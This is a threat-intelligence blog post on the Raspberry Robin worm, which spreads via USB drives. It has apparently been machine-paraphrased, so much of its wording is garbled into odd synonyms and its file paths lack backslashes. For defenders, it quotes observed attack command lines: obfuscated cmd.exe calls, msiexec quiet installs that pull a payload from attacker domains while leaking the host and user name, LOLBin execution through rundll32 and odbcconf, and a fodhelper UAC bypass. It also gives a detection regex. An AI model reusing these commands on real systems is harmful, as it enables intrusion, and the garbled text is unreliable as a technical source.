Raspberry Robin: Extremely Evasive Trojan horse Spreads over Exterior Disks

Creation

Throughout our danger searching workouts in contemporary months, we’ve began to watch a distinguishing development of msiexec.exe utilization throughout other endpoints. As we drilled all the way down to particular person belongings, we discovered lines of a lately found out malware referred to as Raspberry Robin. The RedCanary Analysis Group first coined the identify for this malware of their weblog submit, and Sekoia printed a Flash Record concerning the task underneath the identify of QNAP Trojan horse. Each articles be offering nice research of the malware’s habits. Our findings fortify and enrich prior analysis at the subject.

Execution Chain

Raspberry Robin is a bug that spreads over an exterior power. After preliminary an infection, it downloads its payload thru msiexec.exe from QNAP cloud accounts, executes its code thru rundll32.exe, and establishes a command and keep watch over (C2) channel thru TOR connections.

Let’s walkthrough the stairs of the kill-chain to look how this malware purposes.

Supply and Exploitation

Raspberry Robin is delivered thru inflamed exterior disks. As soon as hooked up, cmd.exe tries to execute instructions from a report inside that disk. This report is both a .lnk report or a report with a particular naming development. Recordsdata with this development show off a 2 to five persona identify with an generally difficult to understand extension, together with .swy, .chk, .ico, .usb, .xml, and .cfg. Additionally, the attacker makes use of a substantial amount of whitespace/non printable characters and converting letter case to keep away from string matching detection ways. Instance command strains come with:

• C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
• C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
• C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
• C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /R C:WINDOWSsystem32cmd.exe<Gne.Swy

Report pattern for supply can also be discovered on this URL:
https://www.virustotal.com/gui/report/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/family members

Subsequent, we apply explorer.exe working with an difficult to understand command line argument, spawned through a prior example of cmd.exe. This difficult to understand argument turns out to take the identify of an inflamed exterior power or .lnk report that used to be in the past completed. Probably the most samples had values together with USB, USB DISK, or USB Pressure, whilst another samples had extra explicit names. On each and every example of explorer.exe we see that the adversary is converting the letter case to keep away from detection:

• ExPLORer [redacted]
• exploREr [redacted]
• ExplORER USB Pressure
• eXplorer USB DISK

Set up

After supply and preliminary execution, cmd.exe spawns msiexec.exe to obtain the Raspberry Robin payload. It makes use of -q or /q at the side of same old set up parameter to function quietly. As soon as once more, blended case letters are used to avoid detection:

• mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
• mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
• MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
• mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
• msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
• MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you’ll be able to see above, URLs used for payload obtain have a particular development. Domain names use 2 to 4 persona names with difficult to understand TLDs together with .xyz, .hk, .information, .pw, .cx, .me, and extra. URL paths have a unmarried listing with a random string 11 characters lengthy, adopted through hostname and the username of the sufferer. On community telemetry, we additionally noticed the Home windows Installer person agent because of using msiexec.exe. To discover Raspberry Robin thru its URL development, use this regex:

^http[s]{0,1}://[a-zA-Z0-9]{2,4}.[a-zA-Z0-9]{2,6}:8080/[a-zA-Z0-9]+/.*?(?:-|=|?).*?$

If we glance up the WHOIS knowledge for given domain names, we see area registration dates going way back to February 2015. We additionally see an build up on registered domain names ranging from September 2021, which aligns with preliminary observations of Raspberry Robin through our friends.

Desk 1: Distribution of area advent dates over the years

Related domain names have SSL certificate with the topic selection identify of q74243532.myqnapcloud.com, which issues out the underlying QNAP cloud infra. Additionally, their URL scan effects go back login pages to QTS provider of QNAP:

As soon as the payload is downloaded, it’s completed thru quite a lot of device binaries. First, rundll32.exe makes use of the ShellExec_RunDLL serve as from shell32.dll to leverage device binaries reminiscent of msiexec.exe, odbcconf.exe, or keep watch over.exe. Those binaries are used to execute the payload saved in C:ProgramData[3 chars]

• C:WINDOWSsystem32rundll32.exe shell32.dll ShellExec_RunDLL C:WINDOWSsyswow64MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:ProgramDataAzuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
• C:Windowssystem32RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:Windowssyswow64odbcconf.exe -s -C -a {regsvr C:ProgramDataTvbzhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
• exe SHELL32,ShellExec_RunDLLA C:WINDOWSsyswow64odbcconf -E /c /C -a {regsvr C:ProgramDataEuoikdvnbb.xml.}
• C:WINDOWSsystem32rundll32.exe SHELL32,ShellExec_RunDLL C:WINDOWSsyswow64CONTROL.EXE C:ProgramDataLzmqkuiht.lkg.

It’s adopted through the execution of fodhelper.exe, which has the automobile increased bit set to true. It’s frequently leveraged through adversaries with the intention to bypass Person Account Regulate and execute further instructions with escalated privileges [3]. To watch suspicious executions of fodhelper.exe, we advise tracking its circumstances with none command line arguments.

Command and Regulate

Raspberry Robin units up its C2 channel thru the extra execution of device binaries with none command line argument, which is slightly ordinary. That most probably issues to procedure injection given increased privileges in earlier steps of execution. It makes use of dllhost.exe, rundll32.exe, and regsvr32.exe to arrange a TOR connection.

Detection thru International Risk Indicators

In Cisco International Risk Indicators to be had thru Cisco Protected Community Analytics and Cisco Protected Endpoint, we observe this task underneath the Raspberry Robin danger object. Symbol 3 displays a detection pattern of Raspberry Robin:

Conclusion

Raspberry Robin tries to stay undetected thru its use of device binaries, blended letter case, TOR-based C2, and abuse of compromised QNAP accounts. Even if we have now an identical intelligence gaps (the way it infects exterior disks, what are its movements on function) like our friends, we’re steadily gazing its actions.

Signs of Compromise

References

1. Raspberry Robin will get the bug early – https://redcanary.com/weblog/raspberry-robin/
2. QNAP bug: who advantages from crime? – https://7095517.fs1.hubspotusercontent-na1.web/hubfs/7095517/FLINTpercent202022-016percent20-%20QNAPpercent20worm_percent20whopercent20benefitspercent20frompercent20crimepercent20(1).pdf
3. UAC Bypass – Fodhelper – https://pentestlab.weblog/2017/06/07/uac-bypass-fodhelper/

Proportion: